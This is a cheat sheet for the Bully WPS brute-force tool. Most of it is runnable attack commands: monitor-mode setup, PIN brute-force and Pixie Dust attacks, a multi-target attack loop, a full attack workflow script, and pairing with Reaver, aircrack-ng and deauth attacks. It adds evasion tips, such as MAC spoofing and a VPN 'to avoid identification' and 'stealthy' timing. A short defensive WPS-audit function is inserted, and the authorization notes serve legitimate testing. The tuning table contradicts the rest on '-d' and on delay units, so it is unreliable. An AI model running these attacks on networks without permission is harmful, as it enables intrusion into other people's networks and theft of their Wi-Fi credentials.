Bully
Bully is a WPS (Wi-Fi Protected Setup) brute-force tool designed for testing WiFi security by attempting to crack WPS PINs through dictionary attacks and exploitation of Pixie Dust vulnerabilities.
Installation
Linux/Ubuntu
# Install dependencies
sudo apt update
sudo apt install libpcap-dev
# Clone and compile from source
git clone https://github.com/aanarchyy/bully.git
cd bully/src
make
sudo make install
# Or install via package manager (if available)
sudo apt install bully
Kali Linux
# Pre-installed on Kali
bully --version
# If not installed
apt-cache search bully
sudo apt install bully
macOS
# Homebrew installation
brew install bully
# From source
git clone https://github.com/aanarchyy/bully.git
cd bully/src
make
sudo cp bully /usr/local/bin/
Basic Commands
| Command | Description |
|---|---|
| bully -h | Display help information |
| bully --version | Show version information |
| bully -b BSSID -c CHANNEL wlan0 | Basic WPS attack (the interface is the last, positional argument) |
| bully -b <BSSID> -c <CH> -s <MAC> wlan0 | Use a specific source MAC address |
| bully -b <BSSID> -c <CH> -p <PIN> wlan0 | Test specific PIN |
| bully -b <BSSID> -c <CH> -v 4 wlan0 | Enable verbose output (verbosity levels 1-4) |
Setup & Interface Configuration
Monitor Mode Activation
# Check available interfaces
ifconfig
iwconfig
# Put interface into monitor mode
sudo airmon-ng start wlan0
# Or using iwconfig
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
# Verify monitor mode
iwconfig wlan0
Finding Target Networks
# Scan for WPS-enabled networks
sudo airodump-ng wlan0mon
# Detailed WPS network scanning
sudo wash -i wlan0mon
# Filter by WPS version
sudo wash -i wlan0mon -f
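From the defender's side, the same wash scan can be compared against an inventory of access points you administer to find those that still advertise WPS and need it disabled. This is an added example, not part of the original cheat sheet or of Bully/Reaver; the wps_audit function, the file names and the sample rows are hypothetical and constructed, and the column layout (BSSID Ch dBm WPS Lck Vendor ESSID) is an assumption about wash's table output.

```shell
# Added example: check which of YOUR access points still advertise WPS.
# Assumed wash column layout: BSSID Ch dBm WPS Lck Vendor ESSID
# wps_audit INVENTORY WASH_OUTPUT
#   INVENTORY: one BSSID per line (APs you administer); '#' starts a comment.
#   Prints one line per inventoried AP: EXPOSED, LOCKED or NO_WPS.
wps_audit() {
    awk '
        FILENAME == ARGV[1] {                      # first file: inventory
            sub(/#.*/, ""); gsub(/[ \t\r]/, "")
            b = toupper($0)
            if (b != "" && !(b in own)) { own[b] = 1; order[++n] = b }
            next
        }
        # second file: skip header/separator rows (column 1 is not a MAC)
        length($1) != 17 || $1 !~ /^[0-9A-Fa-f][0-9A-Fa-f](:[0-9A-Fa-f][0-9A-Fa-f])+$/ { next }
        {
            b = toupper($1)
            if (!(b in own)) next                  # not ours: never reported
            essid = $7
            for (i = 8; i <= NF; i++) essid = essid " " $i   # ESSID may contain spaces
            state = (tolower($5) == "yes") ? "LOCKED" : "EXPOSED"
            seen[b] = state " " b " ch=" $2 " wps=" $4 " essid=" essid
        }
        END {
            for (i = 1; i <= n; i++)
                print ((order[i] in seen) ? seen[order[i]] : "NO_WPS " order[i])
        }
    ' "$1" "$2"
}

# Constructed sample data (not real networks), audited with wps_audit.
wps_audit_demo() {
    tmp=$(mktemp -d) || return 1
    cat > "$tmp/inventory.txt" <<'EOF'
# APs we administer
aa:bb:cc:dd:ee:01
AA:BB:CC:DD:EE:02
AA:BB:CC:DD:EE:03
EOF
    cat > "$tmp/wash.txt" <<'EOF'
BSSID               Ch  dBm  WPS  Lck  Vendor    ESSID
--------------------------------------------------------------------------------
AA:BB:CC:DD:EE:01    6  -48  2.0  No   Broadcom  Office Guest
AA:BB:CC:DD:EE:02   11  -61  1.0  Yes  RalinkTe  Warehouse
11:22:33:44:55:66    1  -70  2.0  No   AtherosC  NotOurs
EOF
    wps_audit "$tmp/inventory.txt" "$tmp/wash.txt"
    rm -rf "$tmp"
}
```

Save a scan with `sudo wash -i wlan0mon > wash.txt` and run `wps_audit inventory.txt wash.txt`. Any EXPOSED or LOCKED line is an access point where WPS is still switched on and should be disabled in its configuration.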
WPS Attack Methods
Standard PIN Brute-Force Attack
# Basic WPS PIN attack (the monitor-mode interface is the last, positional argument)
bully -b AA:BB:CC:DD:EE:FF -c 6 wlan0mon
# With verbose output (-v takes a level from 1 to 4)
bully -b AA:BB:CC:DD:EE:FF -c 6 -v 4 wlan0mon
# Specify starting PIN
bully -b AA:BB:CC:DD:EE:FF -c 6 -p 00000000 wlan0mon
Pixie Dust Attack
# Pixie Dust exploitation (if vulnerable); the flag is -d/--pixiewps (-D is --detectlock)
bully -b AA:BB:CC:DD:EE:FF -c 6 -d wlan0mon
# With additional verbosity
bully -b AA:BB:CC:DD:EE:FF -c 6 -d -v 4 wlan0mon
# Combination with PIN brute-force
bully -b AA:BB:CC:DD:EE:FF -c 6 -d -p 00000000 wlan0mon
Timeout and Retry Configuration
# Extended timeout for unresponsive targets
bully -b AA:BB:CC:DD:EE:FF -c 6 -t 5 wlan0mon
# Custom timeout with retry
bully -b AA:BB:CC:DD:EE:FF -c 6 -t 3 -r 100 wlan0mon
# Delay between attempts (whole seconds, not milliseconds): -1/-2 take M,N,
# meaning wait M seconds after every Nth NACK at M5/M7
bully -b AA:BB:CC:DD:EE:FF -c 6 -1 1,10 -2 1,10 wlan0mon
Output and Logging
Capture and Logging
# Save output to file
bully -b AA:BB:CC:DD:EE:FF -c 6 wlan0mon | tee attack.log
# Verbose logging with timestamp
bully -b AA:BB:CC:DD:EE:FF -c 6 -v 4 wlan0mon 2>&1 | tee -a "wps_attack_$(date +%Y%m%d_%H%M%S).log"
# Log PIN attempts
bully -b AA:BB:CC:DD:EE:FF -c 6 -v 4 wlan0mon > pin_attempts.txt
Parsing Results
# Extract successful credentials
grep -i "wpa" attack.log
# Find discovered PINs
grep -i "pin:" attack.log
# Parse PSK/passphrase
grep -i "psk\|passphrase" attack.log
Advanced Options
MAC Address Spoofing
# Spoof MAC address to avoid detection
sudo ifconfig wlan0mon down
sudo macchanger -m AA:BB:CC:DD:EE:01 wlan0mon
sudo ifconfig wlan0mon up
# Run attack with spoofed MAC
bully -b TARGET_BSSID -c 6 wlan0mon
Multiple Target Testing
# Create target list (one "BSSID channel" pair per line)
cat > targets.txt << EOF
AA:BB:CC:DD:EE:01 6
AA:BB:CC:DD:EE:02 11
AA:BB:CC:DD:EE:03 1
EOF
# Automated attack script (save as its own file so the shebang is the first line)
#!/bin/bash
while IFS=' ' read -r bssid channel; do
    echo "[*] Attacking $bssid on channel $channel"
    bully -b "$bssid" -c "$channel" -v 4 wlan0mon
done < targets.txt
Optimized Attack Configuration
# -1/-2 set the delay as M,N: wait M seconds after every Nth NACK (at M5 and M7)
# Fast attack (minimal waiting)
bully -b AA:BB:CC:DD:EE:FF -c 6 -t 1 -1 0,1 -2 0,1 wlan0mon
# Stealthy attack (slow, less detectable)
bully -b AA:BB:CC:DD:EE:FF -c 6 -t 10 -1 1,1 -2 1,1 wlan0mon
# Balanced approach
bully -b AA:BB:CC:DD:EE:FF -c 6 -t 5 -1 1,2 -2 1,2 wlan0mon
Troubleshooting & Issues
Common Problems
Issue: Interface not in monitor mode
# Check interface status
iwconfig | grep Monitor
# Properly enable monitor mode
sudo airmon-ng check kill
sudo airmon-ng start wlan0
Issue: Connection timeout
# Increase timeout value
bully -b AA:BB:CC:DD:EE:FF -c 6 -t 10 wlan0mon
# Verify AP is reachable
sudo wash -i wlan0mon | grep AA:BB:CC:DD:EE:FF
Issue: Pixie Dust not detected
# Test vulnerability with reaver
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -K 1
# Use bully standard PIN attack instead
bully -b AA:BB:CC:DD:EE:FF -c 6 wlan0mon
Issue: Invalid PIN format
# PIN must be 8 digits
bully -b AA:BB:CC:DD:EE:FF -c 6 -p 12345678 wlan0mon # Valid
# Not: -p 1234567 (7 digits - invalid)
Complete Workflow Example
#!/bin/bash
# Automated WPS attack workflow
TARGET_BSSID="AA:BB:CC:DD:EE:FF"
TARGET_CHANNEL="6"
INTERFACE="wlan0"
INTERFACE_MON="wlan0mon"
# 1. Setup monitor mode
echo "[*] Setting up monitor mode..."
sudo airmon-ng check kill
sudo airmon-ng start "$INTERFACE"
# 2. Identify targets with WPS (wash keeps scanning until interrupted with Ctrl-C)
echo "[*] Scanning for WPS-enabled networks..."
sudo wash -i "$INTERFACE_MON" -a
# 3. Run WPS attack (the interface is the last, positional argument)
echo "[*] Starting Bully WPS attack..."
bully -b "$TARGET_BSSID" -c "$TARGET_CHANNEL" -v 4 "$INTERFACE_MON"
# 4. Check for result
echo "[*] Attack complete. Checking results..."
# 5. Cleanup
echo "[*] Disabling monitor mode..."
sudo airmon-ng stop "$INTERFACE_MON"
Integration with Other Tools
Reaver Coordination
# First try Bully Pixie Dust
bully -b AA:BB:CC:DD:EE:FF -c 6 -d wlan0mon
# Fallback to Reaver standard attack
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -vv
# Continue with Bully
bully -b AA:BB:CC:DD:EE:FF -c 6 -v 4 wlan0mon
Aircrack-ng Integration
# Capture WPA handshake while attacking WPS
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# Run WPS attack in separate terminal
bully -b AA:BB:CC:DD:EE:FF -c 6 wlan0mon
# Crack captured handshake if WPS fails
aircrack-ng -w wordlist.txt capture-01.cap
Best Practices
Operational Security
- Always obtain proper authorization before testing
- Use VPN and MAC spoofing to avoid identification
- Test during off-peak hours when possible
- Monitor for IDS/IPS detection
- Document all testing with timestamps
- Keep Bully updated for latest exploits
Legal & Ethical
- Only test networks you own or have written permission to test
- Understand local laws regarding WiFi penetration testing
- Obtain written authorization from network owner
- Follow responsible disclosure practices
- Maintain confidentiality of discovered credentials
Effectiveness Tips
- Pixie Dust works on ~30-40% of WPS-enabled APs
- Older routers are more likely to be vulnerable
- Some routers have WPS lockout after failed attempts
- Building WPS PIN wordlists can speed up attacks
- Combine with deauth attacks to trigger reconnection
Performance Tuning
| Parameter | Default | Recommended | Effect |
|---|---|---|---|
| Timeout (-t) | 3 | 5-10 | Increase for distant targets |
| Delay (-d) | 0 | 500-1000 | Avoid detection/lockout |
| Threads (-n) | 1 | 5-10 | Faster testing (less stealthy) |
| Retry (-r) | 0 | 100+ | Persist through interference |
Related Tools
- Reaver - Alternative WPS cracking tool
- Wash - WPS vulnerability scanner
- Airmon-ng - Monitor mode management
- Airodump-ng - WiFi scanning
- Hashcat - Post-exploitation password cracking
Last updated: 2026-03-30 | Bully v1.4